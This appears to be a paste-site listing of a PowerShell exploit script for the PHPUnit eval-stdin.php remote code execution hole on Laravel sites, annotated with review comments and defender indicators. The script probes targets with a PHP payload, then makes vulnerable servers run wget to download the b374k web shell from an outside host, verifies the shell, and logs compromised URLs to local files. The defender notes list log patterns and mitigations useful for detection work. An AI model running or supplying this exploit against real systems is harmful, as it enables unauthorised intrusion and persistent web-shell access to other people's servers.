Sweetening

Laravel phpunit Remote Code Execution RCE

Feb 6th, 2024
  1. # Clear the screen based on the OS
     # Cosmetic only: nothing below depends on the result of this block.
     # $env:OS is compared against "Windows*"; when it does not match, the
     # else branch runs instead of Clear-Host.
     # NOTE(review): PowerShell's escape character is the backtick, not the
     # backslash, so "\033c" is a literal six-character string. The else
     # branch prints that text rather than sending an ESC sequence.
  2. if ($env:OS -like "Windows*") {
  3. Clear-Host
  4. } else {
  5. Write-Host $("\033c") # This is an approximation; PowerShell on non-Windows may vary
  6. }
  7.  
  8. # Function to check and exploit the RCE vulnerability
     #
     # What it does, as written:
     #   1. POSTs a PHP snippet to
     #      <Url>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php and treats
     #      a response matching "Linux" as proof that the body was executed.
     #   2. Appends the response and the endpoint URL to phpunitvuln.txt.
     #   3. POSTs a second snippet that makes the server run wget and save a
     #      remote PHP file as unit.php.
     #   4. Requests unit.php next to eval-stdin.php and, if the reply matches
     #      "IDBTE4M", records the URL in shell_phpunit.txt.
     #
     # Parameter:
     #   Url - base URL of the site; the vendor path is appended by string
     #         interpolation, so it is expected without a trailing slash.
     # Output: status lines via Write-Host; two text files appended to in the
     #         current directory. Nothing is returned to the caller.
     #
     # Defender notes (all values taken from this script):
     #   - Web/WAF logs: POST to .../phpunit/src/Util/PHP/eval-stdin.php,
     #     especially with a body that starts with "<?php".
     #   - Web logs: GET .../phpunit/src/Util/PHP/unit.php?ngacengan_su
     #   - File integrity: a new unit.php inside vendor/phpunit/phpunit/src/Util/PHP/
     #   - Egress: the web-server user fetching from raw.githubusercontent.com.
     #   - Root cause is a development dependency reachable over HTTP. Serve
     #     only the application's public/ directory, deploy with
     #     `composer install --no-dev`, deny requests under /vendor at the web
     #     server, and keep PHPUnit on a fixed release.
  9. function Invoke-RCE {
  10. param (
  11. [string]$Url
  12. )
  13.  
      # Probe body: prints php_uname("a") so the reply reveals whether PHP ran it.
  14. $cekosPayload = '<?php echo php_uname("a"); ?>'
      # Second body: shells out to wget and writes the download to unit.php.
      # NOTE(review): the output name is relative, so where the file lands
      # depends on the PHP process's working directory; the script assumes it
      # is the directory holding eval-stdin.php.
  15. $upshellPayload = '<?php system("wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O unit.php"); ?>'
  16.  
      # Any exception from the requests below lands in the single catch block.
  17. try {
      # Only this first request has an explicit timeout (50 s).
  18. $cek = Invoke-RestMethod -Uri "$Url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -Method Post -Body $cekosPayload -TimeoutSec 50
      # -match is a case-insensitive regex test; non-Linux replies fall through
      # to the "[Not Vuln]" branch.
  19. if ($cek -match "Linux") {
  20. Write-Host "[os] $cek"
      # Local log of hosts that answered the probe.
  21. Add-Content -Path "phpunitvuln.txt" -Value ("$cek`n$Url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`n")
      # The response to this request is not inspected; success is judged only
      # by the follow-up GET.
  22. Invoke-RestMethod -Uri "$Url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -Method Post -Body $upshellPayload
  23. $cekshell = Invoke-RestMethod -Uri "$Url/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su"
  24.  
      # "IDBTE4M" is presumably a marker string in the downloaded file's output
      # - not verifiable from this listing.
  25. if ($cekshell -match "IDBTE4M") {
  26. Write-Host "[Shell Uploaded] $Url/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su"
  27. Add-Content -Path "shell_phpunit.txt" -Value ("$cek`n$Url/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su`n")
  28. } else {
  29. Write-Host "[Shell not Uploaded]: $cekshell"
  30. }
  31. } else {
  32. Write-Host "[Not Vuln]: $Url"
  33. }
  34. } catch {
      # The exception itself is discarded, so a timeout, a DNS failure and an
      # HTTP error response all print the same message.
  35. Write-Host "Error contacting $Url"
  36. }
  37. }
  38.  
  39. # Example usage:
      # Calls the function once with a placeholder base URL. The argument has
      # no trailing slash because the function appends "/vendor/..." itself.
  40. Invoke-RCE -Url "http://example.com"
  41.  